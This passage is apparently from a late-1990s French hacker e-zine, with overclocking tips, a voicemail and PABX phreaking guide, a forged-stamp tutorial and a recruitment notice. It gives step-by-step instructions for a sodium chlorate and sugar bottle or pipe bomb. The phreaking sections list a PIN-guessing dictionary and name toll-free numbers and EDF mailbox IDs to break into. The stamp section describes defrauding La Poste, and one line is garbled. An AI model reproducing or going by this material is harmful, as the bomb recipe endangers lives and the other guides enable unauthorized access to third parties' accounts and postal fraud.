du cpu. J'en connais un qui s'appelle "Rain", chercher sur le net.


Overclocker sa 3DFX 1 ?

Oui, c'est possible, mais dangereux, il faut pas trop la laisser chauffer, elle a une fâcheuse
tendance à chauffer.

Méthode:
Il faut modifier l'autoexec.bat: ajoutez les lignes suivantes à la fin:

SET SST_GRXCLK=57 (vitesse du cpu de la 3dfx, on peut l'augmenter plus mais ca peut griller.)
SET SST_FASTMEM=1
SET SST_FASTPCIRD=1

J'ai fait un petit prog en batch, il est à mettre dans l'autoexec.bat, à vous de voir.

----Couper ici--------------------------------------------------
@echo off
cls
echo.
echo  ************************************************************************
echo  * Desirez-vous overclocker votre carte 3DFX, si oui, quelle frequence? *
echo  ************************************************************************
echo.
echo                     1 - 57 MHZ (Overclocking standard)
echo                     2 - 60 MHZ (Overclocking raisonnable)
echo                     3 - 65 MHZ (Overclocking dangereux)
echo                     4 - Ne pas overclocker ma carte 3DFX... 
echo.
choice /C:1234 /N /S Votre reponse:
if errorlevel 4 goto OC4
if errorlevel 3 goto OC3
if errorlevel 2 goto OC2
if errorlevel 1 goto OC1
goto end

:OC1
echo   En cours...
SET SST_GRXCLK=57
SET SST_FASTMEM=1
SET SST_FASTPCIRD=1
goto end


:OC2
echo   En cours...
SET SST_GRXCLK=60
SET SST_FASTMEM=1
SET SST_FASTPCIRD=1
goto end

:OC3
echo   En cours...
SET SST_GRXCLK=65
SET SST_FASTMEM=1
SET SST_FASTPCIRD=1
goto end

:OC4
echo Pas d'overclocking...
goto end

:END
echo   Chargement de Windows 95/98/NT...
----Couper ici--------------------------------------------------

Voilà pour le batch, je vous déconseille de dépasser les 60 mhz si vous n'avez pas
de garantie. Si voulez les dépasser il est conseillé d'installer, un système de refroidissement.

J'espère que cet article vous aura éclairci sur l'overclocking.

Ho oui j'oubliai, je suis aucunement responsable si votre matos grille!


Bon il manque pas mal de trucs dans ton article alors je me permets de rajouter quelques trucs.
Bon nous approchons de Noël et vos parents sont d accord pour vous acheter un nouveau Pc
Voilà ce que je vous propose :
Le celeron 300A ( celle avec 128ko de mémoire cache) c est dingue comme il est facilement
overclockable, on peut le monter a 450 sans rien changer. Il est presque aussi performant qu'un
pentiun 450 (5% de performance en moins je crois ) et ça vous coûtera avec une bonne carte mère
Abit Bx6 ou Bh6 la somme de 1000 francs,puis l avantage des cartes mères que je viens de citer
est la facilité pour les overclocker,tout est dans le bios (régler voltage,coefficient
multiplicateur,bus.. ) Vous n avez pas besoin de bidouiller dans votre pc pour l overclocker et
puis si ca plante vous revenez au Mhz en dessous.

N'achetez pas de celeron 333A because
A cause du coef multiplicateur bloqué, vous avez plus de chance de faire du 450 avec un 300A
avec coef 4,5 que du 500 avec un Celeron 333 d'un coef de 5...pour ne pas prendre de risques
avec vos périphériques PCI et Disque Dur, évitez le bus a 83 mhz


Puis vous vous dites mais comment ca se fait qu'il est aussi rapide qu un P2 alors qu'il a 
que 128 de cache alors que le P2 en a 512ko, car la memoire cache du celeron va allez a la 
même  fréquence que le processeur c est a dire 450 alors que sur les P2 il n ira qu'à
la moitié de la fréquence du processeur c'est à dire 225 Mhz pour un 450mhz ,c est
cette différence de mémoire cache qui permet d overclocker un celeron de 300 a 450. Il ne
chauffe presque pas, si vous vous penchez un peu sur le celeron vous pouvez même le pousser
a 565mhz (attention problème avec le scsi a cette fréquence! ) mais il y a des problèmes
a cette vitesse il parait! Je dis 565 mais il vous faudra rajouter 4 ou 5 ventillo de qualité,
patte thermique,voltage modifie,programme pour refroidir le processeur... la totale quoi
Même mettre un gros ventillo et laisse la capot ouvert! :) je vous dis pas le bruit que ca fait!


Comparaisson de vitesse des processeurs

J'ai piqué le test sur un site bien sur! :) j'ai pas les bécanes chez moi!!


Tout d'abord j'ai effectué le bench qui fait office de standart dans la petite industrie de la
micro informatique, c'est à dire le ZD Winbench 98. Celui ci propose deux petits benchs, le CPU
Mark 32 et FPU MArk. LE CPU Mark donne un indice sur la rapidité du processeur à calculer des
nombres entiers en 32 bits, en théorie toute fois car en fait on s'appercoie dans la réalité
qu'il s'agit plus d'un test du cache qu'autres chose ;). Le FPU Mark quand à lui indique la
rapidité du processeur sur des nombres réels, et met donc en évidence l'unité de calcul en
virgule flottante. On pouvait s'y attendre au CPU Mark le nouveau Celeron n'obtient pas de
superbe scores (normal dans un test de cahce ;).
Au FPU Mark c'est la surprise, le Celeron est très légèrement devant le Pentium2, grâce à son
cache full speed.

Cpu Mark 32

Pentium2 450     1100                               
Pentium2 400     1040
Pentium2 350     910
Celeron  450     889
Pentium2 333     830
Celeron  400     830
Celeron  350     774
Pentium2 300     746
Celeron  333     664 
Celeron  300A    611

Fpu Mark

Pentium2 450   2310                                
Pentium2 400   2060  
Pentium2 350   1800
Celeron  450   2410       En Fpu c'est le top ! :)
Pentium2 333   1710
Celeron  400   2140 
Celeron  350   1870
Pentium2 300   1540
Celeron  333   1780
Celeron  300A  1600


Les processeurs d'Intel sont références par ce que l'on appelle un Sspec, une sorte de numéro
de série.
Certaines séries sont connues pour pouvoir être facilement Overclockable ,
comme les PII 300 SL2W8, ou éventuellement les PII 333 SL2TV ou SL2WY.
Mais rien n'est jamais garanti, surtout pour les PII 333. Par contre, le SL2W8 est pratiquement
sûr à 100 % d'atteindre 450 Mhz.
La référence est gravée sur la tranche supérieure du proc.

Voilà qui est un bon achat les Pc pentium2 300 technologies 0,25 micron, c est a dire comme
la technologie des pentium 2 400 et 450, en faite se sont des pentium 400 qui on était mit
en 300 car les gens voulaient du 300.Les 300 peuvent etre overclocke jusqu a 450 pour le
prix d un 300,sans chauffer car se sont des 400 d origine sous overclocker a 300,faire 
gagner 50 Mhz ne fais presque pas chauffer le Pc,c est pas la peine de rajouter des ventillo.

Si vous voyez que ca plante vous pouvez vous téléchargez des programmes qui gère-le
refroidissement du Cpu,ca marche très bien!!
http://hardware-fr.com/oc/index.htm
Sur ce site il y a plein de conseil pour overclocker votre Pc


Si le Mhz que vous voulez ne passe pas il faut augmenter le voltage,avec une carte mère Abit
Bx OU BH,aucun problème pour cette manipulation qui se fait dans le Bios.
Par contre pour les autres carte mère il vous faudra prendre le manuel et,demonte votre
carte mère et vous amusez avec du scotch en mettant sur le voltage souhaite un
petit bout de scotch!!     La grosse merde! :)
exemple de voltage (2.0,2.2,2.4...)


Bon maintenant je vais vous parler de l'overburn
AHAHHAH vous savez pas ce que c'est?? ;) 
Ca consiste a faire tourner son pc a 100 de ses capacités pendant 1 jour ou 2 a sa fréquence
initiale par exemple 400, puis vous l overclocker a 450 vous refaites une journée d overburn
puis vous avez beaucoup plus de chance de le faire monter a 500.
Ceci a été prouve par des particuliers et amis qui ont réussi cette manœuvre!
Vous vous dites mais comment je vais faire 100% des capacités de mon pc, pour ca allez
telecharger sur le site www.ahead.de (site de nero) à la rubrique support, c est pour graver
et ca permet de faire des CD de 80 min qui occupe 100% des capacités du PC.
Pour faire overburn vous pouvez employer d'autres méthodes comme celle de mettre son processeur
dans le congelo pendant 9 min ce qui l'habituera au grand froid! :) il parait que ca marche.
Il y a aussi la méthode qui consiste a ouvrir son pc de le mettre à 350 a la place de 400
,et de mettre un petit chauffage d appoint,ca permet d habituer le processeur à la chaleur.
A vos risques et péril!! :)

Petite anecdote comme ca en passant, un américain (je crois) a voulu battre des records en
fréquence en le poussant à 1000 mhz son pentium 400,pour ca il a prit de l'azote liquide
qui refroidit a -270°c (oh putain que c est froid) et a plongé son processeur dedans
en allumant son pc le processeur c'est cassé en 2 sous l effet de la température
extrême et du processeur qui a trop chauffé.

Encore une petite anecdote je sais que ca vous plaît !! :)
Un type c'est amusé a mettre son Pc dans le congelo et a le laisse tourner dedans, il parait
que ca marche bien ! :), sinon avec une climatisation sur le processeur et en ouvrant le capot,
je suis sur que ca doit aussi très bien marcher!! 
Tient j'ai lu dans le SVM de décembre qui prévoyait pour l'année prochaine des pentium 1000 et
pour 2012 ou 2014 des pentium 30000 mhz !! oui vous avez bien lu (je crois d après des calculs
qu ils ne peuvent pas aller plus loin car les données vont à la vitesse de la lumière et qu'on
ne sait pas allez plus loin physiquement! )
C est beau comme même la technologie!! Pour cette année 99 on aura droit à la technologie 
0,18 micron par intel bien sur! : ) maman je veux un nouveau pc!!

The End By Cedru


================================================================================================
                             Une petite bombe dangereuse By Fugitif                   
================================================================================================ 


Ou comment se la jouer "L'expert" devant les copains.

Dans cet article je vais vous expliquer comme faire de l'explosif via du sucre et du
désherbant.
Sachez une chose que c'est dangereux ca peut être mortel. Soyez vigilant, minutieux, portez
des gants de cuire et un masque de fer genre pour les chalumeaux. Ce n'est pas une expérience vécue, mais j'ai réuni toutes les théories trouvées un peu partout sur le net, qui fera de cet article un article compréhensif, pas du genre:

Recette de Grand Mère :
50 % désherbant 50 % sucre, mélangez boom!

Je suis pas responsable si ca vous pete à la gueule.

Je vais diviser ce texte en plusieurs étapes :

1 ère étape :

Réunir le matos :
- Une assiette en verre.
- Désherbant contenant de la chlorate de soude ou un paquet de chlorate de soude pur (on peut
l'acheter dans un magasin de chimie, voir B3 ou Bricolage, ou même à la pharmacie.)
- Sucre ou sucre glace.
- Petite bouteille en verre (genre orangina) avec son bouchon => bombe.
- Briquet ou allumette.
- Alcool à brûler + ficelle fine ( 5-10 m) => Pour la mèche.

2 eme étape :

Préparation du mélange :
Ne dépasser pas les 100 grammes pour la première fois.
Versez 2/3 de sucre et 1/3 de désherbant dans l'assiette.
Remuer bien le tout.
Jetez une allumette dans le récipient et écartez-vous.
Une flamme lumineuse jaune très vive doit apparaître faisant de la fumée blanche avec
une odeur de caramel.
Expérimenter votre mélange :
s'il reste des boursouflés noirs, c'est que vous avez mis trop de sucre, s'il reste
du rose, trop de chlorate de soude.

Une fois que vous avez trouver le mélange parfais : étape suivante.

3 eme étape :

Préparation de la bombe :
Versez le mélange parfait, dans la bouteille de verre, très minutieusement.

Préparation de la mèche :
Prenez la ficelle d'environ 5 m (pour bien avoir le temps de se placer pour regarder la
bombe)imbibez-la d'alcool à brûler et faites la sécher au soleil.

Faites un trou dans le bouchon de la bouteille pour faire passer la mèche.
Revisser le bouchon sur la bouteille, faites passer la mèche dans le trou jusqu'à ce qu'elle 
rentre dans la pourdre.

4 eme et dernière étape :

Poser la bombe dans endroit dégager, pas en ville (ca peut faire sauter les vitres des gens :))
Allumez et dégagez vite fais loin et admirez l'explosion, je pense que vous recommencerez pas.
Ne jamais transportez la bombe dans une poche, transportait la en sac plastique.

Je vous conseille même de démarrer avec 30 ou 50 grammes.
Si non vous le faire dans un tube en fer aussi la bombe.
Excusez moi si j'ai fait des erreurs.

Autre préparation :
A la place de la bouteille d'orangina vous pouvez mettre un tube de faire, boucher d'un coté,
remplissé, faites passer la mèche, bouchez de l'autre coté, allumer et boom!!

NdCedru : oui oui encore moi dans cet article, juste dire qu'on voit que tu es Corse!  ;)

================================================================================================
                             Hack de VMB initiation By Fugitif                   
================================================================================================ 

Je sais que c'est répété et rerépété dans tous les zines, mais j'écris quand meme cet article! 
Le principe est simple. Une VMB (Voice Message Box) est une boite au lettre vocal géré par
un central auquel vous phonez. Le plus souvent, c'est un N° vert, tant mieux, comme ca vous coute rien. Dans une VMB, il y a plusieur Boite appartenant à telle et telle personne, mais le plus souvent, les boites appartiennent aux employés de l'entreprise à laquelle appartient la VMB. En étant soit employé de l'entreprise soit quelqu'un ayant une boite dans la VMB, on peut 
envoyer des messages vocales aux membres de la VMB, et en recevoir aussi. Donc c'est sympa pour 
etre contact avec des potes qui sont loin gratos...

Passons à l'attaque!

1 : Trouver une VMB.

Alors cherchez des n° genre 0800  XAB XAB (ex : 0800397397)
                         ou 0800 AB AB AB
                         ou 0800 AB CD CD
                         enfin des n° simples quoi.
Essayez de trouver des vmb françcaises, c'est mieux pour débuter, si etes nul en anglais,
puis les vmb anglaises sont souvent meridians.
Une fois que vous avez trouvé un n°, Lisez en dessous...

2 : On appelle ce n° qui vous coute rien.

Appelez le n° hors heure d'ouverture.

Maintenant il y a plusieurs soluces :
- Si une personne repond => C'est pas bon....
- Si il y a répondeur => Il y a peut etre une vmb.
- Si vous entendez bienvenue à la messagerie kekechose => c'est bon! 

Si c'est parti, maintenant tapez :
* soit # soit 0 soit 81 soit 9 soit 0*
Si rien ne marche, c'est qu 'il y a pas de vmb... 

Ensuite, la femme vous demande si vous voulez envoyer des messages a qulequ'un ou si vous voulez
acceder à votre boite vocales en vous indiquant les n°:
Généralement, 1 pour envoyer et 2 pour accéder.

Donc on tape 2...

La femme vous dit d'entrer votre n° de boite vocale, généralement 4 chiffres:
Les boites sont simples à trouver car quand vous vous trompez de n° la femme dit n° incorrect,
je m'explique :
Je tape 1 la femme dit n° incorrect.
Je tape 2 la femme ne dit rien je continu.
Je tape 1 donc ca donne 21.
Puis je tape encore 1 donc 211, la femme dit incorrect.
Donc je recommence je tape 213, la femme ne dit rien, puis je tape 4 donc 2134 puis la
femme dit n° incorrect, donc j'essaye un autre n°, je tape 2135 la femme ne dit rien, et bingo j'ai trouvé un n° de boite!

Et la la femme dit entrez votre de mot de passe, et c'est la qu'on passse à l'étape suivante.

3: trouver les passes:

Donc les mots de passes sont composés de 4 chiffres généralement, mais la c'est pas aussi simple
car le femme ne dit pas de n° incorect, le premier a essaillé est le n° de la boite vocale et
les mots de passes bateaux.

Mots de passe bateaux pour VMB ou PABX:

0000 1111 2222 3333 4444 5555 6666 7777 8888 9999 
     1000 2000 3000 4000 5000 6000 7000 8000 9000
     0001 0002 0003 0004 0005 0006 0007 0008 0009
     0011 0022 0033 0044 0055 0066 0077 0088 0099
     0111 0222 0333 0444 0555 0666 0777 0888 0999
     1010 2020 3030 4040 5050 6060 7070 8080 9090
----
Continuez la liste dans le même genre.
----
..
1234
5678
3690
0963
9876
6789
2345
3456
4567
5678
6789
4321
8765
----
Inversez! changez etc etc trouvez...
----

Mots de passe avancés :

3614 \
3615  \    Minitel!
3616  /  
3617 /
----
1995 \
1996  \    Les années importantes! (Regardez votre cahier d'histoire!) (Date de naissance
1997  /                                                                   19??...)
1998 /

Les mots de passe qui forment des formes sur le combiné de tel:
(les employés font des formes avec leurs mdp pour s'en souvenir :))

4862 : Croix.
4268 : Croix.
4258 : Un.
8524 : Un.
0852 : Ligne droite.
0258 : Ligne droite.
8741 : Un "L".
1478 : Un "L".
1245 : Carré.
5421 : Carré.

Et puis débrouillez-vous! A vous de faire jouer votre imagination!

C'est bon vous avez reussi.
Passez en dessous.

4: Vous voula dans la VMB :

La femme va vous enumerer les options avec leurs n°.
Il y a pas mal d'options interrsantes telles que :
- Changez le mot de passe.
- Changes le message d'acceuil.
Etc etc...

Sinon il y a des options cachés qu' il faut trouver.
Quand vous envoyez des messages, utilisez toujours un pseudo.

Sinon il existe 3 types de VMB :
- Les 1,2 : 1 pour envoyer les messages, 2 pour aller dans la boite vocale.
- Les 1,# : 1 pour envoyer les messages, # pour aller dans la boite vocale.
- Les meridians => Dans le prochain n°. 

Exemples de hack de vmb :

N° : 0800397397 (je sais pas quelle entreprise c'est ! :))
Je phone :
Je tape #.
Puis je tape 2 pour entrer dans une boite aux lettres, donc c'est une vmb de type 1,2.
Bon, pour les n° de boites, je peux vous dire que c'est dans 5XXX.
Je vous en donne 3.
Boites : - 5123 pass: ????
         - 5349 pass: ????
         - 5348 pass: ????
Je vais pas mettre les passes avec! :)


================================================================================================
                          Comment fabriquer de faux timbres By Droopy
================================================================================================

Introduction :

Bon, voilà, vous venez d'acheter une imprimante couleur, elle vous bouffe beaucoup, beaucoup
d'encre, et ça vous fait chier ???
Alors, voici le moyen de rentabiliser une imprimante couleur en arnaquant la poste...

Matériel :

-  Une imprimante couleur, même une jet-d'encre, ça marche impec !
-  Un bon logiciel de dessin ( Corel, Paint Shop Pro 5, ...)
-  De l'imagination...!

Ce qu'il faut faire :

 Bon, là, le principe est simple, j'ai rien inventé, je ne fais que m'inspirer de ce qui est dit
dans " Le Virus Informatique ".
Vous savez tous que pour poster une lettre il faut un timbre ( ! )
Mais ce timbre n'est qu'un petit morceau de papier imprimé, rien de plus ...
Les machines de la poste repèrent automatiquement les adresses écrites sur les enveloppes, mais
ne savent pas reconnaître les vrais timbres des faux timbres, OK ?
Ce sont les employés du tri postal qui doivent normalement surveiller les timbres des lettres
qui défilent sous leurs yeux...
Mais comme ils sont plus souvent au bar qu'au travail, il n'y a pratiquement aucune chance qu'ils
remarquent quelque chose.
En plus, et les collectionneurs le savent, il sort pas mal de timbres édités par la poste en un
an, et les employés ne peuvent pas tous les connaître !  
Donc, le but du jeu est de dessiner un timbre sur PC, puis de l'imprimer, en taille réelle
bien sûr.

Lancez un logiciel graphique, et :

- Créez l'image : c'est elle qui est la plus importante, elle doit tromper les employés
Alors là, faîtes ce que vous voulez : reproduction de tableaux, ballon de foot, fruits, tour
effeil, pourvu que ça ne paraisse pas louche.

- Mettez lui un texte : il faut qu'il soit en rapport avec l'image !
exemples : fête de la banane, vive le foot, 100 ans de peinture...

- Mettez lui les textes officiels : Le prix en haut à droite  " 3,00  ", la
" REPUBLIQUE FRANCAISE "
en bas ou sur le côté ( ça dépend du sens du timbre), le tout en Times New Roman.

- Recadrez l'image :  pour avoir un timbre de taille normale.


- Imprimez : En assez bonne qualité quand même, et sur un papier qui ne boit pas toute l'encre
( donc de bonne qualité lui aussi ) 
 
- Coupez le timbre : Droit au cutter ou alors vous pouvez vous amuser à lui faire des dentelures
si vous avez des trucs pour mais c'est pas la peine...

Et c'est fini, vous voilà devenu faussaire, arnaquez bien la poste et bonne fabrication !


Conseils :

-Vous pouvez bien sûr reproduire des timbres en les scannant mais c'est pas aussi marrant que de
les faire soi même !

- Ne faites pas de timbres en noir et blanc, ça ne marche pas bien, et l'employé, même s'il est
pas très malin se doute de quelque chose.
J'ai essayé et la lettre n'est pas passée !

- Ne mettez jamais le nom de l'expéditeur ( le vôtre!!! ) au dos de la lettre, sinon ça craint ...

- Je ne crois pas que si la lettre est interceptée ils ont le droit de l'ouvrir mais prudence
quand même !

- Ne mettez pas de faux timbes sur des lettres  " officielles ": factures, lettres à la
poste (!), grosses entreprises nationales...

- Vous pouvez renforcer l'effet du faux timbre en en mettant un vrai à côté.

- J'ai fait mes timbres avec une Epson Stylos Color 600, et avec Corel Draw 4, et ça a super
bien marché !

  
                        Bon, c'est tout, voilà de quoi vous occuper pendant l'hiver...


                                                                                 DRooPY

================================================================================================
			             EMULATION TERMINAL By Droopy
================================================================================================

Il y a un truc rigolo qu'on peut faire avec son modem : c'est se connecter à un numéro de tel
avec son modem en utilisant le mode Emulation Termminal de Winphone.
Comme pour l'article sur le phreaking, je ne vous donne pas des N° avec des loging+passwords
mais des pistes pour que vous cherchiez vous même... 
Avant d'étudier le cas de GATEWAY2000, je vais vous donner quelques N°verts d'émulation
terminal :


0800  90  4404   :  BBS Privé Italien, il demande Nom + Prénom
0800  90  0159   : Pipeline Terminal             login + password
0800  90  1186   : logon ?  mais je peux pas entrer des caractères !!!
0800  90  0049   : Accès : username + password

Là aussi, si vous arrivez à hacker des termiaux, si vous avez d'autres N°, etc...
CONTACTEZ    NOUS   !!!

GATEWAY2000  N°0800 90 64 89: Cette entreprise ( pas besoin de dire ce qu'elle fabrique ! ) a
mis en place une messagerie :

- Si vous arrivez  et que vous êtes nouveau, il faut entrer nom, mot de passe, prénom, adresse,
n°de série du pc gateway,etc... et ils vous laissent 15 minutes pour vous familiariser avec le
service ( messagerie, news...) en vous disant de vous reconnecter 24h + tard, et que votre
messagerie sera mise en place.
J'ai essayé 5 fois et la messagerie me reconnaissait à chaque coup mais passée la limite des 24h
ces cons avaient oublié que j'existais...
D'après ce que je sais c'est pas obligé d'être un utilisateur de P.C Gateway2000 pour utiliser
la messagerie et donc j'ai entré un n° de série bidon.
mais c'est peut être qu'ils ont vu que je n'était pas un utilisateur registré qu'ils m'ont viré
 -   je sais pas !
(Je vais essayer avec un vrai n°de série voir si ça marche ...)

- Si vous arrivez et que vous êtes registré, il faut entrer le mot de passe.
Et c'est là que j'ai utilisé mon genie ( hum et je suis modeste et fier de l'être mais bon
passons ;-))   ) : en tapant un nom anglais au hasard :

Prenom : Paul
Nom : Brown
j'ai découvert qu'il y avait un type qui s'appelait Paul Brown qui utilisait cette messagerie
parce que ça me demandait:
Are you Paul Brown from Crosby On Eden  ?
---    bon pas besoin de traduire j'espère - de toute manière j'ai pas envie prenez un dico  ;-)     ---
Si vous tapez Y, le terminal demande votre mot de passe et là je laisse faire les pros pour
le trouver ...!
Bon je me répète mais si vous arrivez à hacker la messagerie de ce pauvre type, ou que vous
connaissez d'autres terminaux en N°verts, nationaux ou internationaux, dites-le nous !!! 


Voila, c'est tout, amusez vous bien !


================================================================================================
                             Un peu de PHREAKING (EDF) By Droopy
================================================================================================

Intro

Ne vous attendez pas à trouver dans cet article des VMB/PBX toutes prêtes avec des codes et tout...! Cet article a seulement pour but de vous donner des pistes et c'est à vous de vous démerder ensuite...
OK ???
Bon, alors avant d'aller plus loin je vous conseille de lire Death1 ou NoWay si vous ne savez
pas ce qu'est le phreaking sur VMB/PABX et ensuite quand vous avez tout bien pigé revenez ici...

Action

Donc, on va essayer de hacker des VMB/PABX en n°vert :
J'en ai étudié 1 :
 le 0800 00 10 10 qui est la messagerie vocale d'EDF ( et oui ! )
j'ai trouvé quelques BV mais j'ai pas trop essayé de chercher les codes ( 4-6 chiffres), vu que
ça prend du temps...
Voici les boîtes vocales que j'ai trouvées:
441112
441113
442123
442122 ???
442124
442222
442324
442325
442326
442444
442420
442521
442522
442555

Il y a pourtant une BV bizarre : c'est le n° 442122
Si vous appuyez sur 1 pour laisser un message, il y a le message du propriétaire de la BV qui
est diffusé "  .............sans ta copine.....hahihohihohiho (rire con)  "
il y a donc 2 possibilités :
         -  Soit c'est un employé d'EDF qui déconne, c'est possible   !!!
         -  Soit un type est arrivé à hacker une BV et a modifié le message d'accueuil, et
alors ça veut dire qu'EDF est hackable ?
Donc, si vous avez une minute quand vous passez devant une cabine de TEL, ou de chez vous
( on est pas sûr à 100% que ça risque rien mais il y a peu de chances de se vaire prendre, mais
y faut faire attention !) essayez d'entrer des codes d'accès cons, style 0000,1234,1998,... vous
voyez le genre.
Puis si vous avez des résultats prévenez nous !
C'est dur de scanner les N°verts seul alors si ya quelqu'un qui veut m'aider ...

Conclusion 

Bon, c'est tout ce que je sais sur cette messagerie .
En ce moment je suis sur  le 0 800 397 397 et là aussi j'aimerais bien qu'on puisse m' aider...!
(J'ai découvert qu'il y avait une tone d'un brasseur PBX quand on appuyait sur 0)
Si vous savez comment utiliser les wardialers pour hacker des massageries, faîtes-moi signe !!!

================================================================================================
         Insecurite des Autocommutateurs Telephoniques By Admin Telecom X en colére (pHoste)
================================================================================================

Le piratage des reseaux Telephoniques par des Hackers ou des individus malveillants, n'est pas
de la science-fiction ! c'est malheureusement une realitee quotidienne de nos jours. Mais
si les pirates (au sens large) arrivent bien souvent a s'introduire dans les reseux telecoms
des entreprises et administrations publics, c'est bien souvent grace a la negligeance de
certains administrateurs telecoms ou de techniciens de maintenance.

Une des premieres regles en matiere de securite elementaire, n'est d'ailleur que tres rarement
respecter ! il s'agit des mots de passes par defaut installer en usine et qui ne sont pas
changer par la suite par les utilisateurs. Ainsi nombres d'Autocommutateurs qu'ils soient de
type Matra, Alcatel ou autres, sont accecible sans aucun probleme grace a l'utilisation des
mots de passes d'origine. Mais gener[[Y[
\È\È˜]]YˆÛÛšY[ˆÛÝ](tm)[ les societes de maintenance, qui sont charger lors de
l'installation  de l'Autocom, de gerait aussi sont bon fonctionnement a distance
(teleexploitation/telemaintenance). Le plus grave est que dans 90% des cas, l'administrateur
telecom de la societe ou administration qui fait l'acquisition d'un PABX, n'a même pas
connaissance de tous les mots de passes !!,le technicien de maintenance ne lui donnant qu'un
acce " limite " a l'Autocommutateur. Il est tres rare aussi que l'administrateur telecom, ait
la documentation " technique " du PABX, les societes installatrices, n'aimant pas trop diffuser
aux utilisateurs tous les detailles de l'appareil !. C'est ainsi qu'il arrive parfois que des
abus " piratage " soit non pas le fait de jeune Hackers ou d'individus malveillants, mais
d' une utilisation frauduleuse de par des techniciens de telemaintenance !!.

Quelques exemples :

Les PABX Matra de la serie 650x disposent de 2 mots de passes par defauts et d'un (1) mot de
passe exclusif a l'installateur. l'administrateur telecom, n'a connaissance que des deux mots
de passes par defauts, le 3eme lui etant " interdit " !!. De plus, il ne disposera pas 
forcement de tout les droits sur le serveur (minitel). Seul la societe installatrice dispose
d'un droit " total " sur le serveur . dans le même delire, ont retrouvent aussi sur les 6500
(qui fonctionne en ATM, X25 semaphore et avec des serveurs Unix), des serveurs avec le mot de
passe " root " !!.

Idem pour les PABX Alcatel de la serie 4400, dont l'administrateur telecom, n'a qu'un seul et
unique mot de passe par " defaut " pour accede au serveur (Unix). Les autres mots de passes
etant connu seulement de la societe de maintenance !.

Et en suite, ont nous parlent sur un ton grave a travers les medias dit " professionnel des
telecoms " de la hausse constante de la Fraude telephonique ! Hahaha quel culot monstre !.

Ont nous dit " il faut securise les reseaux ! ", alors que les systemes disposent en grande
parti deja de tout se qu'il faut pour en assure la securite !! le seul vrai probleme en fait
et de prendre soin de le faire !. Et puis, ont peut se poser la question suivante .. " a qui
profite le crime ? " , pas aux Hackers sa c'est sur ! mais belle est bien aux societes
installatrices et aux divers experts (pas forcement qualifier!) en securite informatique et
telephonique.

Enfin pour se convaincre que tous les accees aux PABX sont " ouvert " en grand, il suffit de
lire les divers e-mags fait par les Hackers ayant des articles sur le sujet. En voici deux en
exemples qui contiennent des articles tres detailles sur les PABX :  Noroute et HVU mag. en
Francais pour ne cite que cela.

Conclusion :

les vrais Criminels ne sont pas forcement ceux qu'on croit ! (les Hackers) mais bien les
professionnels !

================================================================================================
            Reponse sur l'insecurite et l'incompétence des administrateurs By Cedru
================================================================================================

Tout à fait d'accord avec l'article plus haut d'ailleurs.
J'ai des amis étant en IUT de SRC(informatique de réseau), et leur professeur de réseau leur
a apprit à faire un mot de passe efficasse qui consiste : à avoir plus de 5 lettres au
moins, des chiffres et des lettres dans le passe et que ca ne soit pas (un nom,
prénom,ville,date de naissance).
Ecoutant tout ça mes 2 copains ont regardé quand leur professeur à tappé le code pour accèder
à l'ordinateur réseau, et Oh grande Surprise!!!! 4 lettres, ce qui est assez facile à trouver.
Puis ils ont été sur le site web de leur IUT et ils ont encore regardé le password, et la
c'était la meilleur des meilleurs,c'était la date de naissance du marri (il faut le faire pour
une prof de réseau comme même)
La societe forme des incapables qui nous enseignent des choses que eux meme ne respectent pas!
Pour ca il y d autres exemples de gens incapablent, comme lorsque je suis allé à une boutique
de PC.
J'ai regardé les prix,les pc qui vendaient et le matériel puis j'ai été demandé des trucs
aux vendeurs.
Ex : Vos pentium300 sont des technologie 0,25 micron?? on peut les overcocler??
à 450 mhz vous savez??? Bah non il savait pas!! lui il me disait que le K6 350 c'était le top
que ca valait un 350 pentium ce qui est faux (un K6 350 équivaut à un 300 pentium2 mais quand on
c'est que le K6 est poussé au maximum dans les Mhz et que sur le 350 on peut aller en 400 sans
aucun probleme ) alors finalement ça revient beaucoup plus cher en prix/performance.Je lui
ai demandé ensuite pour le celeron :  
il m'a répondu que c'était de la merde,j'ai commence a lui explique que le celeron
était facilement overclockable dût à l'absence de memoire cache haute,et que la mémoire
cache des celeron tournent à la meme fréquence que l'horloge c'est a dire 450
si vous l overclockez à 450.Il est resté trop con ,et ce qu'il m'a repondu : c'est qu'un type 
avait réussi à faire tourner un K6 a 300 mhz avec un système de refroidissement qui coûte plus
cher que le Pc lui même (vous faites les calculs : pentium 2 450 Overburn et overclocker ça
pousse a 550mhz, sachant qu'un K6 tourne facilement a 50mhz en dessous on a la même rapidité.
Je dirais même plus pour le pentium2, pentium2 450 ne coûtant que 13000 francs même pas, alors
que du truc dont il parlait devrait coûter dans les 50000 francs!

Je parle même pas des fonctionnaires,ami fonctionnaire s'abstenir!! :)
PTT,FT,EDF......... la liste est longue et même trop longue je trouve!!
A quand la libre entrée sur les réseaux de télécommuncation pour les accès locale (téléphoner
de sa région) hein FT???? ras le cul des factures a 4 chiffres!!

================================================================================================
                              Recrute pour un groupe de hacker 
================================================================================================
                            
Donc nous cherchons tout hackers(ou hackeuses)   
voulant se joindre à notre groupe.
Du newbies aux pros nous en foutons de votre niveau:
du moment vous ecrivez des articles.

Mais pour cela vous devrez respectez certaines conditions:

- Faire des articles bien clair et comprehensif.
- Ne poa parle kome ca parceke sinon on pige poa ok?      NDCedru : alors pourquoi on m' a prit?
- Ne pas venir dans le groupe pour de mauvaises intentions.   Ndcedru : on m'aurait menti!!!
- Ne pas donnez de fausse infos.                         NdCedru : on m'a manipulé je te jure!!!
- Ne donnez aucune infos personnelles dans vos articles.
- Respectez tout les menbres du groupe.                  NdCedru : Sauf Heart il fait la sieste!
- Essailez de pas trop faire de fautes ok??              NdCEdru : tu parles pour moi c ça?? ;)

Bon ca devrait suffir pour les conditions :-)

Remarque:
Vos articles peuvent parler de tout.
Ndcedru : voir numero 1 et 2 et mes articles de mes conneries


Pour l'inscription c'est par e-mail que ca se passe:
Envoyez un courrier à:

fugitif@hotmail.com
ou
Cedru13@hotmail.com   (surtout la pour les filles!! )
ou
HeartWork666@hotmail.com (laissez le lui il dort encore pendant un petit moment)

En indiquant:

- Votre nick et votre E-mail.
- Vous vous presentez un peu...(niveau,specialite...) EHeh spécialité!!! :) j'adore!

En joigant:

- Votre ou vos articles qui seront publies dans le prochain nø.
NdCedru : non il rigolait, il faudra plutot lire qui ne sera jamais publie dans les prochains
numeros!! Censure oblige!! :)

================================================================================================
                             Dans le prochain n° et le mot de la fin
================================================================================================


Ben envoyez nous vos articles deja, sinon:

- Service Courrier
- Hack de VMB Meridian By Fugitif
- Vos articles.
- Les meilleurs site Web By Cedru


Le mot de la fin :


